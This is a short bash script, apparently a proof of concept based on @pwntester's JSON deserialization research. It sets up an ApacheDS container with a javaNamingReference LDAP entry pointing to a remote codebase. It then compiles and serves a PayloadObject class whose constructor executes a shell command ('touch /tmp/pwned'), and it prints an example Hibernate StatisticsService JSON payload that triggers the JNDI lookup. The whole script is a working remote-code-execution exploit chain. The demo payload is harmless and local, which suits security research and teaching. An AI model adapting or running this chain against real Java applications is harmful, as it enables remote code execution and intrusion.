Backend script based on @pwntester JSON deserialization research

json-deserialization-ldap.sh

#!/bin/bash

echo "Starting Apache DS using docker @ ldap://localhost:10389"
docker run --name json-deser-ldap -d -p 10389:10389 greggigon/apacheds

echo "... waiting 20 seconds to start Apache DS"
sleep 20

# password: secret, if used with LDAP login
(cat <<"EOF"
dn: cn=deser,dc=example,dc=com
objectClass: top
objectClass: person
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: simpleSecurityObject
objectClass: javaNamingReference
javaCodebase: http://localhost:8000/
javaFactory: PayloadObject
javaClassName: PayloadObject
cn: deser
sn: deser
givenName: deser
mail: deser@example.com
userPassword: {SHA384}WKd1ukESvjAFrkQHznV9iP2nHUBJe7gCbsrFTU4//HIyzo3jq1rLMK45dg/ufFPt

EOF
) | docker exec -i json-deser-ldap ldapadd -x -H ldap://localhost:10389 -D "uid=admin,ou=system" -w secret

echo "Created cn=deser,dc=example,dc=com entry in LDAP"

(cat <<"EOF"
public class PayloadObject {
    public PayloadObject() {
        try {
            System.out.println("\n\n\n\n\n\n\n\n@@@@@@@@@@@@@@\npwned\n@@@@@@@@@@@@@@\n\n\n\n\n\n\n\n\n\n");
            Runtime.getRuntime().exec("touch /tmp/pwned");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
EOF
) > PayloadObject.java; javac PayloadObject.java; rm PayloadObject.java

echo "Created PayloadObject.class"

echo "Starting SimpleHTTPServer @ localhost:8000, press CTRL+C to interrupt"

echo 'Example JSON PAYLOAD: {"org.hibernate.jmx.StatisticsService","sessionFactoryJNDIName":"ldap://localhost:10389/cn=deser,dc=example,dc=com"}'

python -c "import SimpleHTTPServer;SimpleHTTPServer.test()"

echo "Stopping LDAP"
docker stop json-deser-ldap

echo "Removing LDAP docker instance"
docker rm json-deser-ldap